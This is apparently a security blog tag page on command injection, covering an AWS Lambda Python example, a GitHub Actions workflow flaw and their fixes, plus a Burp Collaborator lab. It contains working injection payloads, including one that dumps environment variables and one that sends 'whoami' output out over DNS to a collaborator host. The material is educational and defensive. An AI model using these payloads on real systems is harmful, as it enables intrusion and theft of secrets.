
Tag: Command Injection

AWS Lambda (Python) – Preventing Command Injection

When writing an AWS Lambda function, we need to be careful about secure coding issues.

If your Lambda function takes an input and uses it to run a command, avoid os.system(...). Use subprocess.run(...) without the shell, and pass the command to subprocess as a list of arguments.

Explaining the injection

I will use an example of an AWS Lambda function that takes an input from the event and uses it in a subprocess to run a command. Notice the command is built with an f-string.

import subprocess
import uuid

def lambda_handler(event, context):
    rand_value = uuid.uuid4().hex[:6]
    file_name = f"{event['file_name']}_{rand_value}"
    print('Creating:', file_name)

    result = subprocess.run(f'cd /tmp && touch {file_name} && ls -la', shell=True, stdout=subprocess.PIPE)
    print(result.stdout.decode('utf-8'))

We can inject a malicious file name to steal the values of the environment variables. The demo below runs the same vulnerable logic locally as command_injection.py:

ubuntu@ubuntu-virtual-machine:~$ python3 command_injection.py
Enter file name: hello && env | base64 #
Creating: hello && env | base64 #_526feb
R0pTX0RFQlVHX1RPUElDUz1KUyBFUlJPUjtKUyBMT0cKTEVTU09QRU49fCAvdXNyL2Jpbi9sZXNzcGlwZSAlcwpVU0VSPXVidW50dQpTU0hfQUdFTlRfUElEPTE0MDIKWERHX1NFU1NJT05fVFlQRT14MTEKU0hMVkw9MQpIT01FPS9ob21lL3VidW50dQpPTERQV0Q9L2hvbWUvdWJ1bnR1CkRFU0tUT1BfU0VTU0lPTj11YnVudHUKR05PTUVfU0hFTExfU0VTU0lPTl9NT0RFPXVidW50dQpHVEtfTU9EVUxFUz1nYWlsOmF0ay1icmlkZ2UKTUFOQUdFUlBJRD0xMDI5CkRCVVNfU0VTU0lPTl9CVVNfQUREUkVTUz11bml4OnBhdGg9L[...]
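The attacker then simply decodes the exfiltrated blob. A minimal sketch (the string below is a stand-in encoding of a single leaked variable, not the real dump above):

```shell
# Decode the base64 blob captured from the injected `env | base64` command.
# 'VVNFUj11YnVudHUK' is a hypothetical stand-in for the captured output.
echo 'VVNFUj11YnVudHUK' | base64 -d
# prints: USER=ubuntu
```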

Defence

We should refactor the vulnerable code by adding two defences:

Input validation

Depending on the context, try to whitelist the allowed characters.

If you do not know the allowed characters in advance, then it is crucial that you follow the next defence of passing arguments to subprocess.
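As a sketch, whitelist validation for the file name could look like this (the allowed character set and the function name are assumptions; adjust them to your context):

```python
import re

# Hypothetical whitelist: letters, digits, dot, underscore and hyphen only.
SAFE_NAME = re.compile(r'[A-Za-z0-9._-]+')

def validate_file_name(file_name):
    """Reject any file name containing characters outside the whitelist."""
    if not SAFE_NAME.fullmatch(file_name):
        raise ValueError(f'Invalid file name: {file_name!r}')
    return file_name
```

With this in place, a payload such as `hello && env | base64 #` is rejected before it ever reaches subprocess.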

Usage of arguments in subprocess

Instead of providing the command as a concatenated or formatted string, provide it as a list of arguments, e.g. ['touch', file_name]. This means you need to break the command down into separate `subprocess` calls; you cannot run multiple commands in a single subprocess call.

One common routine is running a sequence of commands in the same directory. With the cwd argument of subprocess.run(...), you can specify where each command should be executed.

import subprocess
import uuid

def lambda_handler(event, context):
    rand_value = uuid.uuid4().hex[:6]
    file_name = f"{event['file_name']}_{rand_value}"
    print('Creating:', file_name)

    working_dir = '/tmp'
    subprocess.run(['touch', file_name], cwd=working_dir, stdout=subprocess.PIPE)
    result = subprocess.run(['ls', '-la'], cwd=working_dir, stdout=subprocess.PIPE)
    print(result.stdout.decode('utf-8'))
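If you ever do need shell features (pipes, redirection) and cannot avoid shell=True, quote the untrusted value with shlex.quote so the shell treats it as a single literal token. A minimal sketch (the argument-list form above remains the preferred defence):

```python
import shlex

file_name = 'hello && env | base64 #'
# shlex.quote wraps unsafe values in single quotes, so the shell sees one
# token rather than a chain of commands.
command = f'touch {shlex.quote(file_name)}'
print(command)
# prints: touch 'hello && env | base64 #'
```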

GH Actions Misconfiguration – causing Command Injection

Suppose you have a GitHub Actions workflow like the one below. The workflow is triggered when a new issue comment is created or an existing comment is edited:

name: GitHub Actions Demo
on:
  issue_comment:
    types: [created, edited]
jobs:
  Explore-GitHub-Actions:
    runs-on: ubuntu-latest
    steps:
      - run: echo "🎉 The job was automatically triggered by a ${{ github.event_name }} event."
      - run: echo "🐧 This job is now running on a ${{ runner.os }} server hosted by GitHub!"
      - run: echo "🔎 The name of your branch is ${{ github.ref }} and your repository is ${{ github.repository }}."
      - run: echo ${{ github.event.comment.body }}

Notice that ${{ github.event.comment.body }} is used directly in the run step? This makes the workflow vulnerable to Command Injection. Why?

Read this: https://securitylab.github.com/research/github-actions-untrusted-input/#remediation

In this context, someone can inject commands into the workflow by adding a payload to an issue comment; the workflow runs every time a comment is created or edited.
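To see why, note that ${{ ... }} expressions are substituted into the step's script before the shell ever runs. Assuming a hypothetical comment body of `hello; echo bye`, the run step literally becomes:

```shell
# What GitHub Actions hands to the shell after substituting the expression:
echo hello; echo bye
# the attacker-controlled `echo bye` now runs as its own command
```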

Did you notice we can run echo bye? This is just a simple example, but a worse scenario could be a reverse shell (if you are using self-hosted GitHub runners) or secrets theft.


You can even attack in a stealth mode by deleting the comment immediately once the workflow is triggered.

How to prevent the issue?

Set the GitHub context data in an environment variable before you use it in the run step:

[...]
      - env: # Add this
          BODY: ${{ github.event.comment.body }} # Add this
        run: echo "$BODY"

Add a new comment that contains a payload:

You can see the workflow now interprets the comment body as a string rather than interpolating it as a command to execute.
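The difference is easy to reproduce locally: once the value sits in an environment variable and is expanded as "$BODY", the shell never parses its contents (the payload below is hypothetical):

```shell
# Simulating the fixed workflow step: the payload stays inert inside a
# quoted environment variable.
BODY='hello; echo bye'
echo "$BODY"
# prints the literal string: hello; echo bye
```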

Testing Blind Command Injection with Burp Collaborator

Recently, I was doing a few labs on Command Injection. It was mentioned that in most situations, the tester will not be able to see the response of the injected command, so alternative ways need to be explored to check whether a Blind Command Injection exists in the web application.

One way to validate the existence of a Blind Command Injection is to inject an nslookup command. In this scenario, we can use Burp Collaborator to verify whether the web application performed a DNS lookup. Please refer to this lab for more details.

First, you will need to click “Copy to clipboard” in the Burp Collaborator client. Insert the copied URL into the vulnerable parameter. Send this request to the web server.

Payload: & nslookup <INSERT BURP COLLABORATOR URL HERE> &
Example: & nslookup abcde1234.burpcollaborator.net. &

Second, click “Poll now” in the Burp Collaborator client. If a new DNS lookup appears, it means the Blind Command Injection is working.

In addition, you can also extract the output of a command using the payload below:

& nslookup `whoami`.<INSERT BURP COLLABORATOR URL HERE> &

In Burp Collaborator, we can see that there was a DNS lookup to the domain (containing the whoami result).
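This works because the backticks are command substitution: the shell runs whoami first and splices its output into the hostname, so the DNS lookup itself carries the data out. A sketch using the example domain from above:

```shell
# Command substitution runs before nslookup, so the whoami output becomes
# the leftmost label of the hostname that gets resolved (and logged by
# Burp Collaborator).
host="$(whoami).abcde1234.burpcollaborator.net"
echo "$host"
# e.g. ubuntu.abcde1234.burpcollaborator.net
```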